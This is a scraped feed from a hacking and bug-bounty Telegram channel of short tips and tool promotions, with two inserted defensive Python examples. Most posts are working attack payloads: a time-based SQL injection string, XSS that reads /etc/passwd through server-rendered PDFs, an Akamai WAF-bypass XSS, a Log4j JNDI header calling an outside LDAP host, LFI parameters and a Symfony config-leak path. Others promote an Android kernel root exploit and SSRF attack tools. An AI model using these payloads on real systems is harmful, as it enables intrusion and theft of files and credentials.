BugCod3 – Telegram
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: T.me/BugCod3GP
📂 Topic: T.me/BugCod3Topic

🤖 Contact: T.me/BugCod3BOT
📧 Email: BugCod3@protonmail.com
If you find Web frameworks like Symfony, add
'/app_dev.php/_profiler/open?file=app/config/parameters.yml'
to the wordlist, and you may get juicy data.

#BugBounty #Tips

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Tip for Stored XSS Bypass on Profile Uploader:
+ add a magic number (jpg, jpeg)
+ bypass the file extension protection

Magic Number

#BugBounty #Tips

Canarytokens

You'll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page's image tag, and monitoring incoming GET requests.

Imagine doing that, but for file reads, database queries, process executions or patterns in log files. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.

🌐 Site

#Pentesting #BugBounty

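The web-bug mechanism described in the Canarytokens post, as an added example (not code from the Canarytokens project or from the channel): each trap gets a unique image URL, and any GET for that URL in the access log is an alert. The host `canary.example`, the 16-character token format, the registry and the log lines are all constructed for illustration.

```python
import re

# Constructed registry: token -> memo describing where the trap was planted.
REGISTRY = {
    "k3v9q2m7x1p8d4zs": "finance-share/Q3-payroll.docx",
    "b7t1w6n0c5r2h8ya": "wiki page: VPN admin credentials",
}

def web_bug(base_url: str, token: str) -> str:
    """HTML for an invisible image whose URL is unique to one trap."""
    return f'<img src="{base_url}/{token}/pixel.gif" width="1" height="1" alt="">'

# Common Log Format line requesting /<16-char token>/pixel.gif
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"GET /(?P<token>[a-z0-9]{16})/pixel\.gif(?:\?[^" ]*)? HTTP/[\d.]+" \d{3}'
)

def triggered(log_lines, registry):
    """Return one alert per logged GET that hits a registered token URL."""
    alerts = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a token-shaped request
        memo = registry.get(m["token"])
        if memo is None:
            continue  # token-shaped but never issued: scanner noise, not a trap
        alerts.append({"when": m["ts"], "source": m["ip"], "trap": memo})
    return alerts

# Constructed access-log sample (documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.23 - - [12/Mar/2024:09:14:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.77 - - [12/Mar/2024:09:15:40 +0000] "GET /k3v9q2m7x1p8d4zs/pixel.gif HTTP/1.1" 200 43',
    '203.0.113.90 - - [12/Mar/2024:09:16:05 +0000] "GET /aaaaaaaaaaaaaaaa/pixel.gif HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    print(web_bug("https://canary.example", "k3v9q2m7x1p8d4zs"))
    for alert in triggered(SAMPLE_LOG, REGISTRY):
        print(alert)
```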
Translate JavaScript to other writing systems!

Site

ΔYロIᗐコΞ 👾

LFI Vulnerability Testing: Key Parameters

?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}

#BugBounty #infosec

For 0Day SQLI in

(app extension)

payload was:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

#BugBounty #Tips

XSS to Exfiltrate Data from PDFs

<noscript>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</noscript><noscript>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</noscript>

How to use:
Server Side XSS (Dynamic PDF)

#XSS #PDF

┌──(BugCod3㉿kali)-[~]
└─$ sudo rm -rf *1402

┌──(BugCod3㉿kali)-[~]
└─$ sudo mkdir 1403


#Notification #NewYear

If you are testing an API, observe these before fuzzing:

1. Does it return the same data for /v1/user and /v1/user?

2. Is it case sensitive?

/v1/user => 200 OK

/v1/USER => 200 OK

OR

/v1/user => 200 OK

/v1/User => 404

What naming convention is used: user_groups, userGroups, etc.? You can then build your fuzzing wordlist according to this data, but there are always exceptions.

#BugBounty #Tips

Akamai WAF bypass XSS

<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>

#BugBounty #Tips

Log4j 🙌 The application was running Java

Vulnerable header:
X-Forwarded-For: ${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>}

#BugBounty #Tips #Security

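A detection-side view of the header in the Log4j post, as an added example (not code from the channel or from Log4j): it scans request headers for JNDI lookups and resolves nested `${name:-default}` expressions first, so the finding shows the callback hostname to search for in DNS logs. Other nested lookups such as `${hostName}` are left as placeholders because their values exist only at runtime; the sample requests are constructed, apart from the header value taken from the post.

```python
import re

# Innermost ${...} expression: a body with no nested "$", "{" or "}".
INNER = re.compile(r"\$\{([^${}]*)\}")

def _resolve(body: str) -> str:
    """Approximate what a nested lookup expands to before the outer one runs."""
    if ":-" in body:                  # ${name:-default} -> default
        return body.split(":-", 1)[1]
    return f"<{body}>"                # runtime value (e.g. hostName): placeholder

def find_jndi_lookups(value: str, max_rounds: int = 10) -> list:
    """Return every JNDI lookup in value, with nested defaults resolved."""
    hits = []

    def repl(match):
        body = match.group(1)
        if body.lower().startswith("jndi:"):
            hits.append(body)
            return ""
        return _resolve(body)

    for _ in range(max_rounds):       # bounded, so crafted nesting cannot loop forever
        value, replaced = INNER.subn(repl, value)
        if replaced == 0:
            break
    return hits

def scan_requests(requests):
    """Return (request index, header name, resolved lookup) for each finding."""
    findings = []
    for index, headers in enumerate(requests):
        for name, value in headers.items():
            for lookup in find_jndi_lookups(value):
                findings.append((index, name, lookup))
    return findings

# Constructed sample; the second header value is the one quoted in the post.
SAMPLE_REQUESTS = [
    {"User-Agent": "Mozilla/5.0", "X-Forwarded-For": "198.51.100.7"},
    {"X-Forwarded-For": "${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>}"},
    {"Referer": "https://shop.example/?q=${price}"},
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print(finding)
```

The resolved value shows that the callback name carries a fixed marker (`874705`), the target's hostname and the name of the injected header, which is what to look for in resolver logs.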
Easy P1 🔥
Add to your wordlist

/ganglia/
/ganglia/?c=ElastiCluster&m=load_one&r=hour&s=by%20name&hc=4&mc=2


#BugBounty #Tips

Mali GPU Kernel LPE

Android 14 kernel exploit for Pixel7/8 Pro

This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:

Pixel 8 Pro: google/husky/husky:14/UD1A.231105.004/11010374:user/release-keys
Pixel 7 Pro: google/cheetah/cheetah:14/UP1A.231105.003/11010452:user/release-keys
Pixel 7 Pro: google/cheetah/cheetah:14/UP1A.231005.007/10754064:user/release-keys
Pixel 7: google/panther/panther:14/UP1A.231105.003/11010452:user/release-keys

Vulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the gpu_pixel_handle_buffer_liveness_update_ioctl ioctl command, and an information leak within the timeline stream message buffers.

Github

⬇️ Download
🔓 BugCod3

#C #Exploit #Android #Kernel #Pixel

java2S3 Amazon S3 Bucket Enumeration Tool

Introduction:
This Python script automates the enumeration of S3 buckets referenced in a subdomain's JavaScript files. This allows the bug bounty hunter to check for security misconfigurations and pentest Amazon S3 buckets.

Features:
⚪️ Fetches HTTP status codes for subdomains
⚪️ Retrieves JavaScript URLs associated with each subdomain
⚪️ Identifies Amazon S3 buckets in the content

Getting Started:
Prerequisites:
Python 3.x
Install required libraries:
pip install requests


Usage:
Create a text file (input.txt) containing a list of subdomains (one per line).

python js2s3.py input.txt example.com output.txt


Github

⬇️ Download
🔓 BugCod3

#Python #Amazon #S3 #Buckets

SSRF Proxy

SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).

Once configured, SSRF Proxy attempts to format client HTTP requests appropriately for the vulnerable server. Likewise, the server's response is parsed and formatted for the client.

By correctly formatting the client request and stripping unwanted junk from the response, it is possible to use SSRF Proxy as an HTTP proxy for web browsers, proxychains, and scanning tools such as sqlmap, nmap, dirb and nikto.

SSRF Proxy also assists with leveraging blind SSRF vulnerabilities to perform time-based attacks, such as blind time-based SQL injection with sqlmap.

Requirements:
Ruby 2.2.2 or newer.
Ruby Gems:
celluloid-io
webrick
logger
colorize
ipaddress
base32
htmlentities
socksify
mimemagic

Installation:
gem install ssrf_proxy


Usage (command line):
ssrf-proxy [options] -u <SSRF URL>

ssrf-proxy -u http://target/?url=xxURLxx


Github

⬇️ Download
🔓 BugCod3

#Ruby #Proxy #SSRF

httprebind

Automatic tool for DNS rebinding-based SSRF attacks

Installation:
sudo pip install dnslib flask flask_cors


Usage:
sudo python httprebind.py domain.name serverIp mode


Where mode is one of: ec2, ecs, gcloud

Make sure you point your domain's nameservers to the server indicated by serverIp, and that this IP is the server's external IPv4 address.

Github

⬇️ Download
🔓 BugCod3

#Python #DNS #SSRF #Attack

hackerone-reports

Top disclosed reports from HackerOne

Top HackerOne reports. Raw info for all reports is stored in data.csv. The scripts that update this file are written in Python 3 and require the chromedriver and Chromium executables on PATH. Every script contains some info about how it works. The run order of the scripts:


1. fetcher.py
2. uniquer.py
3. filler.py
4. rater.py

Github

⬇️ Download
🔓 BugCod3

#BugBounty #Reports #HackerOne

DOM-XSS-SiteMinder

Payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e

📞 Nuclei Template

#XSS #DOM

Form Finder

This script can be used to find HTML forms in a list of endpoints/URLs.

Usage:
python3 formfinder.py endpoints.txt


😸 Github

⬇️ Download
🔒 BugCod3

#Python #Form #Finder
